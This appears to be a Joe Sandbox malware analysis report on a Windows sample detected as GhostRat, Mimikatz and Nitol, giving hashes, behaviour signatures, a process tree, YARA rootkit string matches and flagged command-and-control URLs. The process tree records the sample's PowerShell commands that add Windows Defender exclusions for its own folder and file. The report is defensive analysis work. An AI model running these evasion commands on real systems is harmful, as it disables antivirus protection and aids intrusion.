Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SystemProcess18.exe

Overview

General Information

Sample name:SystemProcess18.exe
Analysis ID:1640060
MD5:ddc764d0b18c5af9f7e94e9d5eebb48f
SHA1:a06d80258da2a37c316b56cd73423a1127ff0079
SHA256:299e6791e4eb85617c4fab7f27ac53fb70cd038671f011007831b558c318b369
Tags:exeuser-tvishwa107
Infos:

Detection

GhostRat, Mimikatz, Nitol
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GhostRat
Yara detected Mimikatz
Yara detected Nitol
Adds a directory exclusion to Windows Defender
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking mutex)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SystemProcess18.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\SystemProcess18.exe" MD5: DDC764D0B18C5AF9F7E94E9D5EEBB48F)
    • cmd.exe (PID: 7456 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SystemProcess18.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\SystemProcess18.exe" MD5: DDC764D0B18C5AF9F7E94E9D5EEBB48F)
      • cmd.exe (PID: 7540 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7660 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5352 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8052 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 3340 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 344 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3744 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6620 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4556 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7680 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4160 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7812 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 3144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8156 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4484 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 1212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7828 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 4520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5640 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2280 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7472 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8052 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6832 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7648 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3996 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7592 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6448 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 1944 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 4680 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 1560 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3956 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 4928 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2968 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2792 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 4932 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 4900 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3384 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchos1.exe (PID: 3400 cmdline: C:\Users\Public\Documents\MM\svchos1.exe MD5: DDC764D0B18C5AF9F7E94E9D5EEBB48F)
    • svchos1.exe (PID: 5780 cmdline: "C:\Users\Public\Documents\MM\svchos1.exe" MD5: DDC764D0B18C5AF9F7E94E9D5EEBB48F)
      • powershell.exe (PID: 7028 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8084 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1388 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4196 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MimiKatzVaronis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.
  • APT32
  • Anunak
  • GALLIUM
https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz
NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol
No configs have been found
SourceRuleDescriptionAuthorStrings
0000001D.00000002.3732839256.000000000316B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
    0000001C.00000002.3734597891.000000000356C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
      0000001C.00000002.3734864842.00000000036AB000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
        0000001D.00000002.3732199510.0000000002A6C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
          SourceRuleDescriptionAuthorStrings
          28.2.svchos1.exe.36bcd38.5.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
          • 0x7b12:$h1: Hid_State
          • 0x7b26:$h2: Hid_StealthMode
          • 0x7b46:$h3: Hid_HideFsDirs
          • 0x7b64:$h4: Hid_HideFsFiles
          • 0x7b84:$h5: Hid_HideRegKeys
          • 0x7ba4:$h6: Hid_HideRegValues
          • 0x7bc8:$h7: Hid_IgnoredImages
          • 0x7bec:$h8: Hid_ProtectedImages
          • 0xc42e:$s1: FLTMGR.SYS
          • 0xc9aa:$s2: HAL.dll
          • 0x954e:$s3: \SystemRoot\System32\csrss.exe
          • 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
          • 0x258:$s5: INIT
          • 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
          29.2.svchos1.exe.317cd38.5.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
          • 0x7b12:$h1: Hid_State
          • 0x7b26:$h2: Hid_StealthMode
          • 0x7b46:$h3: Hid_HideFsDirs
          • 0x7b64:$h4: Hid_HideFsFiles
          • 0x7b84:$h5: Hid_HideRegKeys
          • 0x7ba4:$h6: Hid_HideRegValues
          • 0x7bc8:$h7: Hid_IgnoredImages
          • 0x7bec:$h8: Hid_ProtectedImages
          • 0xc42e:$s1: FLTMGR.SYS
          • 0xc9aa:$s2: HAL.dll
          • 0x954e:$s3: \SystemRoot\System32\csrss.exe
          • 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
          • 0x258:$s5: INIT
          • 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
          29.2.svchos1.exe.318c380.6.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
          • 0xaa30:$h1: Hid_State
          • 0xaa50:$h2: Hid_StealthMode
          • 0xaa70:$h3: Hid_HideFsDirs
          • 0xaa90:$h4: Hid_HideFsFiles
          • 0xaab0:$h5: Hid_HideRegKeys
          • 0xaad0:$h6: Hid_HideRegValues
          • 0xab00:$h7: Hid_IgnoredImages
          • 0xab30:$h8: Hid_ProtectedImages
          • 0xfb5a:$s1: FLTMGR.SYS
          • 0xc6b0:$s3: \SystemRoot\System32\csrss.exe
          • 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
          28.2.svchos1.exe.358cd04.1.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
          • 0xaa30:$h1: Hid_State
          • 0xaa50:$h2: Hid_StealthMode
          • 0xaa70:$h3: Hid_HideFsDirs
          • 0xaa90:$h4: Hid_HideFsFiles
          • 0xaab0:$h5: Hid_HideRegKeys
          • 0xaad0:$h6: Hid_HideRegValues
          • 0xab00:$h7: Hid_IgnoredImages
          • 0xab30:$h8: Hid_ProtectedImages
          • 0xfb5a:$s1: FLTMGR.SYS
          • 0xc6b0:$s3: \SystemRoot\System32\csrss.exe
          • 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
          28.2.svchos1.exe.357d6bc.3.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
          • 0x7b12:$h1: Hid_State
          • 0x7b26:$h2: Hid_StealthMode
          • 0x7b46:$h3: Hid_HideFsDirs
          • 0x7b64:$h4: Hid_HideFsFiles
          • 0x7b84:$h5: Hid_HideRegKeys
          • 0x7ba4:$h6: Hid_HideRegValues
          • 0x7bc8:$h7: Hid_IgnoredImages
          • 0x7bec:$h8: Hid_ProtectedImages
          • 0xc42e:$s1: FLTMGR.SYS
          • 0xc9aa:$s2: HAL.dll
          • 0x954e:$s3: \SystemRoot\System32\csrss.exe
          • 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
          • 0x258:$s5: INIT
          • 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
          Click to see the 47 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Documents\MM\svchos1.exe, CommandLine: C:\Users\Public\Documents\MM\svchos1.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\MM\svchos1.exe, NewProcessName: C:\Users\Public\Documents\MM\svchos1.exe, OriginalFileName: C:\Users\Public\Documents\MM\svchos1.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\Public\Documents\MM\svchos1.exe, ProcessId: 3400, ProcessName: svchos1.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\Public\Documents\MM\svchos1.exe, ParentImage: C:\Users\Public\Documents\MM\svchos1.exe, ParentProcessId: 3400, ParentProcessName: svchos1.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 1388, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SystemProcess18.exe", ParentImage: C:\Users\user\Desktop\SystemProcess18.exe, ParentProcessId: 7464, ParentProcessName: SystemProcess18.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 7660, ProcessName: powershell.exe
          Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7456, TargetFilename: C:\Users\Public\Documents\MM
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 38.46.13.66, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\SystemProcess18.exe, Initiated: true, ProcessId: 7464, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49700
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SystemProcess18.exe", ParentImage: C:\Users\user\Desktop\SystemProcess18.exe, ParentProcessId: 7464, ParentProcessName: SystemProcess18.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 7660, ProcessName: powershell.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SystemProcess18.exe", ParentImage: C:\Users\user\Desktop\SystemProcess18.exe, ParentProcessId: 7464, ParentProcessName: SystemProcess18.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 7660, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-16T22:30:14.492378+010020283713Unknown Traffic192.168.2.649693113.142.77.41443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txtAvira URL Cloud: Label: malware
          Source: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txtAvira URL Cloud: Label: malware
          Source: C:\Users\Public\Documents\MM\svchos1.exeReversingLabs: Detection: 41%
          Source: SystemProcess18.exeVirustotal: Detection: 50%Perma Link
          Source: SystemProcess18.exeReversingLabs: Detection: 41%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
          Source: SystemProcess18.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49693 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49699 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49698 version: TLS 1.2
          Source: SystemProcess18.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\ZZ\Desktop\RpcTsch\Release\RpcTsch.pdb source: SystemProcess18.exe, SystemProcess18.exe, 00000000.00000003.1485028271.0000000003DE0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\zz\Desktop\CCCC\Release\CCCC.pdb source: SystemProcess18.exe, 00000000.00000000.1226278101.00000000001C6000.00000002.00000001.01000000.00000003.sdmp, SystemProcess18.exe, 00000003.00000000.1266376609.00000000001C6000.00000002.00000001.01000000.00000003.sdmp
          Source: Binary string: \Release\Dll1.pdb source: svchos1.exe
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: z:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: x:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: v:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: t:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: r:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: p:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: n:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: l:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: j:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: h:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: f:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: b:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: y:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: w:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: u:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: s:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: q:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: o:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: m:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: k:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: i:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: g:Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: e:Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile opened: [:Jump to behavior
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006E6AD8 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,28_2_006E6AD8
